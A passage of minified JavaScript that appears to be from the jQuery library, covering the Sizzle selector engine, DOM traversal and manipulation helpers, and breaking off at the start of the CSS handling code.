i,j,k,l,n,q,r,t,u=!0,v=m.isXML(d),w=[],x=b;do{a.exec(""),i=a.exec(x);if(i){x=i[3],w.push(i[1]);if(i[2]){l=i[3];break}}}while(i);if(w.length>1&&p.exec(b))if(w.length===2&&o.relative[w[0]])j=y(w[0]+w[1],d,f);else{j=o.relative[w[0]]?[d]:m(w.shift(),d);while(w.length)b=w.shift(),o.relative[b]&&(b+=w.shift()),j=y(b,j,f)}else{!f&&w.length>1&&d.nodeType===9&&!v&&o.match.ID.test(w[0])&&!o.match.ID.test(w[w.length-1])&&(n=m.find(w.shift(),d,v),d=n.expr?m.filter(n.expr,n.set)[0]:n.set[0]);if(d){n=f?{expr:w.pop(),set:s(f)}:m.find(w.pop(),w.length===1&&(w[0]==="~"||w[0]==="+")&&d.parentNode?d.parentNode:d,v),j=n.expr?m.filter(n.expr,n.set):n.set,w.length>0?k=s(j):u=!1;while(w.length)q=w.pop(),r=q,o.relative[q]?r=w.pop():q="",r==null&&(r=d),o.relative[q](k,r,v)}else k=w=[]}k||(k=j),k||m.error(q||b);if(g.call(k)==="[object Array]")if(!u)e.push.apply(e,k);else 
if(d&&d.nodeType===1)for(t=0;k[t]!=null;t++)k[t]&&(k[t]===!0||k[t].nodeType===1&&m.contains(d,k[t]))&&e.push(j[t]);else for(t=0;k[t]!=null;t++)k[t]&&k[t].nodeType===1&&e.push(j[t]);else s(k,e);l&&(m(l,h,e,f),m.uniqueSort(e));return e};m.uniqueSort=function(a){if(u){h=i,a.sort(u);if(h)for(var b=1;b<a.length;b++)a[b]===a[b-1]&&a.splice(b--,1)}return a},m.matches=function(a,b){return m(a,null,null,b)},m.matchesSelector=function(a,b){return m(b,null,null,[a]).length>0},m.find=function(a,b,c){var d,e,f,g,h,i;if(!a)return[];for(e=0,f=o.order.length;e<f;e++){h=o.order[e];if(g=o.leftMatch[h].exec(a)){i=g[1],g.splice(1,1);if(i.substr(i.length-1)!=="\\"){g[1]=(g[1]||"").replace(j,""),d=o.find[h](g,b,c);if(d!=null){a=a.replace(o.match[h],"");break}}}}d||(d=typeof b.getElementsByTagName!="undefined"?b.getElementsByTagName("*"):[]);return{set:d,expr:a}},m.filter=function(a,c,d,e){var f,g,h,i,j,k,l,n,p,q=a,r=[],s=c,t=c&&c[0]&&m.isXML(c[0]);while(a&&c.length){for(h in o.filter)if((f=o.leftMatch[h].exec(a))!=null&&f[2]){k=o.filter[h],l=f[1],g=!1,f.splice(1,1);if(l.substr(l.length-1)==="\\")continue;s===r&&(r=[]);if(o.preFilter[h]){f=o.preFilter[h](f,s,d,r,e,t);if(!f)g=i=!0;else if(f===!0)continue}if(f)for(n=0;(j=s[n])!=null;n++)j&&(i=k(j,f,n,s),p=e^i,d&&i!=null?p?g=!0:s[n]=!1:p&&(r.push(j),g=!0));if(i!==b){d||(s=r),a=a.replace(o.match[h],"");if(!g)return[];break}}if(a===q)if(g==null)m.error(a);else break;q=a}return s},m.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)};var n=m.getText=function(a){var b,c,d=a.nodeType,e="";if(d){if(d===1||d===9){if(typeof a.textContent=="string")return a.textContent;if(typeof a.innerText=="string")return a.innerText.replace(k,"");for(a=a.firstChild;a;a=a.nextSibling)e+=n(a)}else if(d===3||d===4)return a.nodeValue}else for(b=0;c=a[b];b++)c.nodeType!==8&&(e+=n(c));return 
e},o=m.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF\-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF\-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF\-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF\-]|\\.)+)\s*(?:(\S?=)\s*(?:(['"])(.*?)\3|(#?(?:[\w\u00c0-\uFFFF\-]|\\.)*)|)|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*\-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\(\s*(even|odd|(?:[+\-]?\d+|(?:[+\-]?\d*)?n\s*(?:[+\-]\s*\d+)?))\s*\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^\-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF\-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(a){return a.getAttribute("href")},type:function(a){return a.getAttribute("type")}},relative:{"+":function(a,b){var c=typeof b=="string",d=c&&!l.test(b),e=c&&!d;d&&(b=b.toLowerCase());for(var f=0,g=a.length,h;f<g;f++)if(h=a[f]){while((h=h.previousSibling)&&h.nodeType!==1);a[f]=e||h&&h.nodeName.toLowerCase()===b?h||!1:h===b}e&&m.filter(b,a,!0)},">":function(a,b){var c,d=typeof b=="string",e=0,f=a.length;if(d&&!l.test(b)){b=b.toLowerCase();for(;e<f;e++){c=a[e];if(c){var g=c.parentNode;a[e]=g.nodeName.toLowerCase()===b?g:!1}}}else{for(;e<f;e++)c=a[e],c&&(a[e]=d?c.parentNode:c.parentNode===b);d&&m.filter(b,a,!0)}},"":function(a,b,c){var d,f=e++,g=x;typeof b=="string"&&!l.test(b)&&(b=b.toLowerCase(),d=b,g=w),g("parentNode",b,f,a,d,c)},"~":function(a,b,c){var d,f=e++,g=x;typeof b=="string"&&!l.test(b)&&(b=b.toLowerCase(),d=b,g=w),g("previousSibling",b,f,a,d,c)}},find:{ID:function(a,b,c){if(typeof b.getElementById!="undefined"&&!c){var d=b.getElementById(a[1]);return d&&d.parentNode?[d]:[]}},NAME:function(a,b){if(typeof b.getElementsByName!="undefined"){var c=[],d=b.getElementsByName(a[1]);for(var e=0,f=d.length;e<f;e++)d[e].getAttribute("name")===a[1]&&c.push(d[e]);return c.length===0?null:c}},TAG:function(a,b){if(typeof b.getElementsByTagName!="undefined")return 
b.getElementsByTagName(a[1])}},preFilter:{CLASS:function(a,b,c,d,e,f){a=" "+a[1].replace(j,"")+" ";if(f)return a;for(var g=0,h;(h=b[g])!=null;g++)h&&(e^(h.className&&(" "+h.className+" ").replace(/[\t\n\r]/g," ").indexOf(a)>=0)?c||d.push(h):c&&(b[g]=!1));return!1},ID:function(a){return a[1].replace(j,"")},TAG:function(a,b){return a[1].replace(j,"").toLowerCase()},CHILD:function(a){if(a[1]==="nth"){a[2]||m.error(a[0]),a[2]=a[2].replace(/^\+|\s*/g,"");var b=/(-?)(\d*)(?:n([+\-]?\d*))?/.exec(a[2]==="even"&&"2n"||a[2]==="odd"&&"2n+1"||!/\D/.test(a[2])&&"0n+"+a[2]||a[2]);a[2]=b[1]+(b[2]||1)-0,a[3]=b[3]-0}else a[2]&&m.error(a[0]);a[0]=e++;return a},ATTR:function(a,b,c,d,e,f){var g=a[1]=a[1].replace(j,"");!f&&o.attrMap[g]&&(a[1]=o.attrMap[g]),a[4]=(a[4]||a[5]||"").replace(j,""),a[2]==="~="&&(a[4]=" "+a[4]+" ");return a},PSEUDO:function(b,c,d,e,f){if(b[1]==="not")if((a.exec(b[3])||"").length>1||/^\w/.test(b[3]))b[3]=m(b[3],null,null,c);else{var g=m.filter(b[3],c,d,!0^f);d||e.push.apply(e,g);return!1}else if(o.match.POS.test(b[0])||o.match.CHILD.test(b[0]))return!0;return b},POS:function(a){a.unshift(!0);return a}},filters:{enabled:function(a){return a.disabled===!1&&a.type!=="hidden"},disabled:function(a){return a.disabled===!0},checked:function(a){return a.checked===!0},selected:function(a){a.parentNode&&a.parentNode.selectedIndex;return a.selected===!0},parent:function(a){return!!a.firstChild},empty:function(a){return!a.firstChild},has:function(a,b,c){return!!m(c[3],a).length},header:function(a){return/h\d/i.test(a.nodeName)},text:function(a){var b=a.getAttribute("type"),c=a.type;return a.nodeName.toLowerCase()==="input"&&"text"===c&&(b===c||b===null)},radio:function(a){return a.nodeName.toLowerCase()==="input"&&"radio"===a.type},checkbox:function(a){return a.nodeName.toLowerCase()==="input"&&"checkbox"===a.type},file:function(a){return a.nodeName.toLowerCase()==="input"&&"file"===a.type},password:function(a){return 
a.nodeName.toLowerCase()==="input"&&"password"===a.type},submit:function(a){var b=a.nodeName.toLowerCase();return(b==="input"||b==="button")&&"submit"===a.type},image:function(a){return a.nodeName.toLowerCase()==="input"&&"image"===a.type},reset:function(a){var b=a.nodeName.toLowerCase();return(b==="input"||b==="button")&&"reset"===a.type},button:function(a){var b=a.nodeName.toLowerCase();return b==="input"&&"button"===a.type||b==="button"},input:function(a){return/input|select|textarea|button/i.test(a.nodeName)},focus:function(a){return a===a.ownerDocument.activeElement}},setFilters:{first:function(a,b){return b===0},last:function(a,b,c,d){return b===d.length-1},even:function(a,b){return b%2===0},odd:function(a,b){return b%2===1},lt:function(a,b,c){return b<c[3]-0},gt:function(a,b,c){return b>c[3]-0},nth:function(a,b,c){return c[3]-0===b},eq:function(a,b,c){return c[3]-0===b}},filter:{PSEUDO:function(a,b,c,d){var e=b[1],f=o.filters[e];if(f)return f(a,c,b,d);if(e==="contains")return(a.textContent||a.innerText||n([a])||"").indexOf(b[3])>=0;if(e==="not"){var g=b[3];for(var h=0,i=g.length;h<i;h++)if(g[h]===a)return!1;return!0}m.error(e)},CHILD:function(a,b){var c,e,f,g,h,i,j,k=b[1],l=a;switch(k){case"only":case"first":while(l=l.previousSibling)if(l.nodeType===1)return!1;if(k==="first")return!0;l=a;case"last":while(l=l.nextSibling)if(l.nodeType===1)return!1;return!0;case"nth":c=b[2],e=b[3];if(c===1&&e===0)return!0;f=b[0],g=a.parentNode;if(g&&(g[d]!==f||!a.nodeIndex)){i=0;for(l=g.firstChild;l;l=l.nextSibling)l.nodeType===1&&(l.nodeIndex=++i);g[d]=f}j=a.nodeIndex-e;return c===0?j===0:j%c===0&&j/c>=0}},ID:function(a,b){return a.nodeType===1&&a.getAttribute("id")===b},TAG:function(a,b){return b==="*"&&a.nodeType===1||!!a.nodeName&&a.nodeName.toLowerCase()===b},CLASS:function(a,b){return(" "+(a.className||a.getAttribute("class"))+" ").indexOf(b)>-1},ATTR:function(a,b){var 
c=b[1],d=m.attr?m.attr(a,c):o.attrHandle[c]?o.attrHandle[c](a):a[c]!=null?a[c]:a.getAttribute(c),e=d+"",f=b[2],g=b[4];return d==null?f==="!=":!f&&m.attr?d!=null:f==="="?e===g:f==="*="?e.indexOf(g)>=0:f==="~="?(" "+e+" ").indexOf(g)>=0:g?f==="!="?e!==g:f==="^="?e.indexOf(g)===0:f==="$="?e.substr(e.length-g.length)===g:f==="|="?e===g||e.substr(0,g.length+1)===g+"-":!1:e&&d!==!1},POS:function(a,b,c,d){var e=b[2],f=o.setFilters[e];if(f)return f(a,c,b,d)}}},p=o.match.POS,q=function(a,b){return"\\"+(b-0+1)};for(var r in o.match)o.match[r]=new RegExp(o.match[r].source+/(?![^\[]*\])(?![^\(]*\))/.source),o.leftMatch[r]=new RegExp(/(^(?:.|\r|\n)*?)/.source+o.match[r].source.replace(/\\(\d+)/g,q));var s=function(a,b){a=Array.prototype.slice.call(a,0);if(b){b.push.apply(b,a);return b}return a};try{Array.prototype.slice.call(c.documentElement.childNodes,0)[0].nodeType}catch(t){s=function(a,b){var c=0,d=b||[];if(g.call(a)==="[object Array]")Array.prototype.push.apply(d,a);else if(typeof a.length=="number")for(var e=a.length;c<e;c++)d.push(a[c]);else for(;a[c];c++)d.push(a[c]);return d}}var u,v;c.documentElement.compareDocumentPosition?u=function(a,b){if(a===b){h=!0;return 0}if(!a.compareDocumentPosition||!b.compareDocumentPosition)return a.compareDocumentPosition?-1:1;return a.compareDocumentPosition(b)&4?-1:1}:(u=function(a,b){if(a===b){h=!0;return 0}if(a.sourceIndex&&b.sourceIndex)return a.sourceIndex-b.sourceIndex;var c,d,e=[],f=[],g=a.parentNode,i=b.parentNode,j=g;if(g===i)return v(a,b);if(!g)return-1;if(!i)return 1;while(j)e.unshift(j),j=j.parentNode;j=i;while(j)f.unshift(j),j=j.parentNode;c=e.length,d=f.length;for(var k=0;k<c&&k<d;k++)if(e[k]!==f[k])return v(e[k],f[k]);return k===c?v(a,f[k],-1):v(e[k],b,1)},v=function(a,b,c){if(a===b)return c;var d=a.nextSibling;while(d){if(d===b)return-1;d=d.nextSibling}return 1}),function(){var a=c.createElement("div"),d="script"+(new Date).getTime(),e=c.documentElement;a.innerHTML="<a 
name='"+d+"'/>",e.insertBefore(a,e.firstChild),c.getElementById(d)&&(o.find.ID=function(a,c,d){if(typeof c.getElementById!="undefined"&&!d){var e=c.getElementById(a[1]);return e?e.id===a[1]||typeof e.getAttributeNode!="undefined"&&e.getAttributeNode("id").nodeValue===a[1]?[e]:b:[]}},o.filter.ID=function(a,b){var c=typeof a.getAttributeNode!="undefined"&&a.getAttributeNode("id");return a.nodeType===1&&c&&c.nodeValue===b}),e.removeChild(a),e=a=null}(),function(){var a=c.createElement("div");a.appendChild(c.createComment("")),a.getElementsByTagName("*").length>0&&(o.find.TAG=function(a,b){var c=b.getElementsByTagName(a[1]);if(a[1]==="*"){var d=[];for(var e=0;c[e];e++)c[e].nodeType===1&&d.push(c[e]);c=d}return c}),a.innerHTML="<a href='#'></a>",a.firstChild&&typeof a.firstChild.getAttribute!="undefined"&&a.firstChild.getAttribute("href")!=="#"&&(o.attrHandle.href=function(a){return a.getAttribute("href",2)}),a=null}(),c.querySelectorAll&&function(){var a=m,b=c.createElement("div"),d="__sizzle__";b.innerHTML="<p class='TEST'></p>";if(!b.querySelectorAll||b.querySelectorAll(".TEST").length!==0){m=function(b,e,f,g){e=e||c;if(!g&&!m.isXML(e)){var h=/^(\w+$)|^\.([\w\-]+$)|^#([\w\-]+$)/.exec(b);if(h&&(e.nodeType===1||e.nodeType===9)){if(h[1])return s(e.getElementsByTagName(b),f);if(h[2]&&o.find.CLASS&&e.getElementsByClassName)return s(e.getElementsByClassName(h[2]),f)}if(e.nodeType===9){if(b==="body"&&e.body)return s([e.body],f);if(h&&h[3]){var i=e.getElementById(h[3]);if(!i||!i.parentNode)return s([],f);if(i.id===h[3])return s([i],f)}try{return s(e.querySelectorAll(b),f)}catch(j){}}else if(e.nodeType===1&&e.nodeName.toLowerCase()!=="object"){var k=e,l=e.getAttribute("id"),n=l||d,p=e.parentNode,q=/^\s*[+~]/.test(b);l?n=n.replace(/'/g,"\\$&"):e.setAttribute("id",n),q&&p&&(e=e.parentNode);try{if(!q||p)return s(e.querySelectorAll("[id='"+n+"'] "+b),f)}catch(r){}finally{l||k.removeAttribute("id")}}}return a(b,e,f,g)};for(var e in a)m[e]=a[e];b=null}}(),function(){var 
a=c.documentElement,b=a.matchesSelector||a.mozMatchesSelector||a.webkitMatchesSelector||a.msMatchesSelector;if(b){var d=!b.call(c.createElement("div"),"div"),e=!1;try{b.call(c.documentElement,"[test!='']:sizzle")}catch(f){e=!0}m.matchesSelector=function(a,c){c=c.replace(/\=\s*([^'"\]]*)\s*\]/g,"='$1']");if(!m.isXML(a))try{if(e||!o.match.PSEUDO.test(c)&&!/!=/.test(c)){var f=b.call(a,c);if(f||!d||a.document&&a.document.nodeType!==11)return f}}catch(g){}return m(c,null,null,[a]).length>0}}}(),function(){var a=c.createElement("div");a.innerHTML="<div class='test e'></div><div class='test'></div>";if(!!a.getElementsByClassName&&a.getElementsByClassName("e").length!==0){a.lastChild.className="e";if(a.getElementsByClassName("e").length===1)return;o.order.splice(1,0,"CLASS"),o.find.CLASS=function(a,b,c){if(typeof b.getElementsByClassName!="undefined"&&!c)return b.getElementsByClassName(a[1])},a=null}}(),c.documentElement.contains?m.contains=function(a,b){return a!==b&&(a.contains?a.contains(b):!0)}:c.documentElement.compareDocumentPosition?m.contains=function(a,b){return!!(a.compareDocumentPosition(b)&16)}:m.contains=function(){return!1},m.isXML=function(a){var b=(a?a.ownerDocument||a:0).documentElement;return b?b.nodeName!=="HTML":!1};var y=function(a,b,c){var d,e=[],f="",g=b.nodeType?[b]:b;while(d=o.match.PSEUDO.exec(a))f+=d[0],a=a.replace(o.match.PSEUDO,"");a=o.relative[a]?a+"*":a;for(var h=0,i=g.length;h<i;h++)m(a,g[h],e,c);return m.filter(f,e)};m.attr=f.attr,m.selectors.attrMap={},f.find=m,f.expr=m.selectors,f.expr[":"]=f.expr.filters,f.unique=m.uniqueSort,f.text=m.getText,f.isXMLDoc=m.isXML,f.contains=m.contains}();var L=/Until$/,M=/^(?:parents|prevUntil|prevAll)/,N=/,/,O=/^.[^:#\[\.,]*$/,P=Array.prototype.slice,Q=f.expr.match.POS,R={children:!0,contents:!0,next:!0,prev:!0};f.fn.extend({find:function(a){var b=this,c,d;if(typeof a!="string")return f(a).filter(function(){for(c=0,d=b.length;c<d;c++)if(f.contains(b[c],this))return!0});var 
e=this.pushStack("","find",a),g,h,i;for(c=0,d=this.length;c<d;c++){g=e.length,f.find(a,this[c],e);if(c>0)for(h=g;h<e.length;h++)for(i=0;i<g;i++)if(e[i]===e[h]){e.splice(h--,1);break}}return e},has:function(a){var b=f(a);return this.filter(function(){for(var a=0,c=b.length;a<c;a++)if(f.contains(this,b[a]))return!0})},not:function(a){return this.pushStack(T(this,a,!1),"not",a)},filter:function(a){return this.pushStack(T(this,a,!0),"filter",a)},is:function(a){return!!a&&(typeof a=="string"?Q.test(a)?f(a,this.context).index(this[0])>=0:f.filter(a,this).length>0:this.filter(a).length>0)},closest:function(a,b){var c=[],d,e,g=this[0];if(f.isArray(a)){var h=1;while(g&&g.ownerDocument&&g!==b){for(d=0;d<a.length;d++)f(g).is(a[d])&&c.push({selector:a[d],elem:g,level:h});g=g.parentNode,h++}return c}var i=Q.test(a)||typeof a!="string"?f(a,b||this.context):0;for(d=0,e=this.length;d<e;d++){g=this[d];while(g){if(i?i.index(g)>-1:f.find.matchesSelector(g,a)){c.push(g);break}g=g.parentNode;if(!g||!g.ownerDocument||g===b||g.nodeType===11)break}}c=c.length>1?f.unique(c):c;return this.pushStack(c,"closest",a)},index:function(a){if(!a)return this[0]&&this[0].parentNode?this.prevAll().length:-1;if(typeof a=="string")return f.inArray(this[0],f(a));return f.inArray(a.jquery?a[0]:a,this)},add:function(a,b){var c=typeof a=="string"?f(a,b):f.makeArray(a&&a.nodeType?[a]:a),d=f.merge(this.get(),c);return this.pushStack(S(c[0])||S(d[0])?d:f.unique(d))},andSelf:function(){return this.add(this.prevObject)}}),f.each({parent:function(a){var b=a.parentNode;return b&&b.nodeType!==11?b:null},parents:function(a){return f.dir(a,"parentNode")},parentsUntil:function(a,b,c){return f.dir(a,"parentNode",c)},next:function(a){return f.nth(a,2,"nextSibling")},prev:function(a){return f.nth(a,2,"previousSibling")},nextAll:function(a){return f.dir(a,"nextSibling")},prevAll:function(a){return f.dir(a,"previousSibling")},nextUntil:function(a,b,c){return f.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return 
f.dir(a,"previousSibling",c)},siblings:function(a){return f.sibling(a.parentNode.firstChild,a)},children:function(a){return f.sibling(a.firstChild)},contents:function(a){return f.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:f.makeArray(a.childNodes)}},function(a,b){f.fn[a]=function(c,d){var e=f.map(this,b,c);L.test(a)||(d=c),d&&typeof d=="string"&&(e=f.filter(d,e)),e=this.length>1&&!R[a]?f.unique(e):e,(this.length>1||N.test(d))&&M.test(a)&&(e=e.reverse());return this.pushStack(e,a,P.call(arguments).join(","))}}),f.extend({filter:function(a,b,c){c&&(a=":not("+a+")");return b.length===1?f.find.matchesSelector(b[0],a)?[b[0]]:[]:f.find.matches(a,b)},dir:function(a,c,d){var e=[],g=a[c];while(g&&g.nodeType!==9&&(d===b||g.nodeType!==1||!f(g).is(d)))g.nodeType===1&&e.push(g),g=g[c];return e},nth:function(a,b,c,d){b=b||1;var e=0;for(;a;a=a[c])if(a.nodeType===1&&++e===b)break;return a},sibling:function(a,b){var c=[];for(;a;a=a.nextSibling)a.nodeType===1&&a!==b&&c.push(a);return c}});var V="abbr|article|aside|audio|canvas|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",W=/ jQuery\d+="(?:\d+|null)"/g,X=/^\s+/,Y=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/ig,Z=/<([\w:]+)/,$=/<tbody/i,_=/<|&#?\w+;/,ba=/<(?:script|style)/i,bb=/<(?:script|object|embed|option|style)/i,bc=new RegExp("<(?:"+V+")","i"),bd=/checked\s*(?:[^=]|=\s*.checked.)/i,be=/\/(java|ecma)script/i,bf=/^\s*<!(?:\[CDATA\[|\-\-)/,bg={option:[1,"<select 
multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]},bh=U(c);bg.optgroup=bg.option,bg.tbody=bg.tfoot=bg.colgroup=bg.caption=bg.thead,bg.th=bg.td,f.support.htmlSerialize||(bg._default=[1,"div<div>","</div>"]),f.fn.extend({text:function(a){if(f.isFunction(a))return this.each(function(b){var c=f(this);c.text(a.call(this,b,c.text()))});if(typeof a!="object"&&a!==b)return this.empty().append((this[0]&&this[0].ownerDocument||c).createTextNode(a));return f.text(this)},wrapAll:function(a){if(f.isFunction(a))return this.each(function(b){f(this).wrapAll(a.call(this,b))});if(this[0]){var b=f(a,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstChild&&a.firstChild.nodeType===1)a=a.firstChild;return a}).append(this)}return this},wrapInner:function(a){if(f.isFunction(a))return this.each(function(b){f(this).wrapInner(a.call(this,b))});return this.each(function(){var b=f(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=f.isFunction(a);return this.each(function(c){f(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){f.nodeName(this,"body")||f(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(a){this.nodeType===1&&this.appendChild(a)})},prepend:function(){return this.domManip(arguments,!0,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this)});if(arguments.length){var a=f.clean(arguments);a.push.apply(a,this.toArray());return 
this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this.nextSibling)});if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,f.clean(arguments));return a}},remove:function(a,b){for(var c=0,d;(d=this[c])!=null;c++)if(!a||f.filter(a,[d]).length)!b&&d.nodeType===1&&(f.cleanData(d.getElementsByTagName("*")),f.cleanData([d])),d.parentNode&&d.parentNode.removeChild(d);return this},empty:function()
-{for(var a=0,b;(b=this[a])!=null;a++){b.nodeType===1&&f.cleanData(b.getElementsByTagName("*"));while(b.firstChild)b.removeChild(b.firstChild)}return this},clone:function(a,b){a=a==null?!1:a,b=b==null?a:b;return this.map(function(){return f.clone(this,a,b)})},html:function(a){if(a===b)return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(W,""):null;if(typeof a=="string"&&!ba.test(a)&&(f.support.leadingWhitespace||!X.test(a))&&!bg[(Z.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(Y,"<$1></$2>");try{for(var c=0,d=this.length;c<d;c++)this[c].nodeType===1&&(f.cleanData(this[c].getElementsByTagName("*")),this[c].innerHTML=a)}catch(e){this.empty().append(a)}}else f.isFunction(a)?this.each(function(b){var c=f(this);c.html(a.call(this,b,c.html()))}):this.empty().append(a);return this},replaceWith:function(a){if(this[0]&&this[0].parentNode){if(f.isFunction(a))return this.each(function(b){var c=f(this),d=c.html();c.replaceWith(a.call(this,b,d))});typeof a!="string"&&(a=f(a).detach());return this.each(function(){var b=this.nextSibling,c=this.parentNode;f(this).remove(),b?f(b).before(a):f(c).append(a)})}return this.length?this.pushStack(f(f.isFunction(a)?a():a),"replaceWith",a):this},detach:function(a){return this.remove(a,!0)},domManip:function(a,c,d){var e,g,h,i,j=a[0],k=[];if(!f.support.checkClone&&arguments.length===3&&typeof j=="string"&&bd.test(j))return this.each(function(){f(this).domManip(a,c,d,!0)});if(f.isFunction(j))return this.each(function(e){var g=f(this);a[0]=j.call(this,e,c?g.html():b),g.domManip(a,c,d)});if(this[0]){i=j&&j.parentNode,f.support.parentNode&&i&&i.nodeType===11&&i.childNodes.length===this.length?e={fragment:i}:e=f.buildFragment(a,this,k),h=e.fragment,h.childNodes.length===1?g=h=h.firstChild:g=h.firstChild;if(g){c=c&&f.nodeName(g,"tr");for(var l=0,m=this.length,n=m-1;l<m;l++)d.call(c?bi(this[l],g):this[l],e.cacheable||m>1&&l<n?f.clone(h,!0,!0):h)}k.length&&f.each(k,bp)}return this}}),f.buildFragment=function(a,b,d){var 
e,g,h,i,j=a[0];b&&b[0]&&(i=b[0].ownerDocument||b[0]),i.createDocumentFragment||(i=c),a.length===1&&typeof j=="string"&&j.length<512&&i===c&&j.charAt(0)==="<"&&!bb.test(j)&&(f.support.checkClone||!bd.test(j))&&(f.support.html5Clone||!bc.test(j))&&(g=!0,h=f.fragments[j],h&&h!==1&&(e=h)),e||(e=i.createDocumentFragment(),f.clean(a,i,e,d)),g&&(f.fragments[j]=h?e:1);return{fragment:e,cacheable:g}},f.fragments={},f.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){f.fn[a]=function(c){var d=[],e=f(c),g=this.length===1&&this[0].parentNode;if(g&&g.nodeType===11&&g.childNodes.length===1&&e.length===1){e[b](this[0]);return this}for(var h=0,i=e.length;h<i;h++){var j=(h>0?this.clone(!0):this).get();f(e[h])[b](j),d=d.concat(j)}return this.pushStack(d,a,e.selector)}}),f.extend({clone:function(a,b,c){var d,e,g,h=f.support.html5Clone||!bc.test("<"+a.nodeName)?a.cloneNode(!0):bo(a);if((!f.support.noCloneEvent||!f.support.noCloneChecked)&&(a.nodeType===1||a.nodeType===11)&&!f.isXMLDoc(a)){bk(a,h),d=bl(a),e=bl(h);for(g=0;d[g];++g)e[g]&&bk(d[g],e[g])}if(b){bj(a,h);if(c){d=bl(a),e=bl(h);for(g=0;d[g];++g)bj(d[g],e[g])}}d=e=null;return h},clean:function(a,b,d,e){var g;b=b||c,typeof b.createElement=="undefined"&&(b=b.ownerDocument||b[0]&&b[0].ownerDocument||c);var h=[],i;for(var j=0,k;(k=a[j])!=null;j++){typeof k=="number"&&(k+="");if(!k)continue;if(typeof k=="string")if(!_.test(k))k=b.createTextNode(k);else{k=k.replace(Y,"<$1></$2>");var l=(Z.exec(k)||["",""])[1].toLowerCase(),m=bg[l]||bg._default,n=m[0],o=b.createElement("div");b===c?bh.appendChild(o):U(b).appendChild(o),o.innerHTML=m[1]+k+m[2];while(n--)o=o.lastChild;if(!f.support.tbody){var 
p=$.test(k),q=l==="table"&&!p?o.firstChild&&o.firstChild.childNodes:m[1]==="<table>"&&!p?o.childNodes:[];for(i=q.length-1;i>=0;--i)f.nodeName(q[i],"tbody")&&!q[i].childNodes.length&&q[i].parentNode.removeChild(q[i])}!f.support.leadingWhitespace&&X.test(k)&&o.insertBefore(b.createTextNode(X.exec(k)[0]),o.firstChild),k=o.childNodes}var r;if(!f.support.appendChecked)if(k[0]&&typeof (r=k.length)=="number")for(i=0;i<r;i++)bn(k[i]);else bn(k);k.nodeType?h.push(k):h=f.merge(h,k)}if(d){g=function(a){return!a.type||be.test(a.type)};for(j=0;h[j];j++)if(e&&f.nodeName(h[j],"script")&&(!h[j].type||h[j].type.toLowerCase()==="text/javascript"))e.push(h[j].parentNode?h[j].parentNode.removeChild(h[j]):h[j]);else{if(h[j].nodeType===1){var s=f.grep(h[j].getElementsByTagName("script"),g);h.splice.apply(h,[j+1,0].concat(s))}d.appendChild(h[j])}}return h},cleanData:function(a){var b,c,d=f.cache,e=f.event.special,g=f.support.deleteExpando;for(var h=0,i;(i=a[h])!=null;h++){if(i.nodeName&&f.noData[i.nodeName.toLowerCase()])continue;c=i[f.expando];if(c){b=d[c];if(b&&b.events){for(var j in b.events)e[j]?f.event.remove(i,j):f.removeEvent(i,j,b.handle);b.handle&&(b.handle.elem=null)}g?delete i[f.expando]:i.removeAttribute&&i.removeAttribute(f.expando),delete d[c]}}}});var bq=/alpha\([^)]*\)/i,br=/opacity=([^)]*)/,bs=/([A-Z]|^ms)/g,bt=/^-?\d+(?:px)?$/i,bu=/^-?\d/,bv=/^([\-+])=([\-+.\de]+)/,bw={position:"absolute",visibility:"hidden",display:"block"},bx=["Left","Right"],by=["Top","Bottom"],bz,bA,bB;f.fn.css=function(a,c){if(arguments.length===2&&c===b)return this;return f.access(this,a,c,!0,function(a,c,d){return d!==b?f.style(a,c,d):f.css(a,c)})},f.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=bz(a,"opacity","opacity");return c===""?"1":c}return 
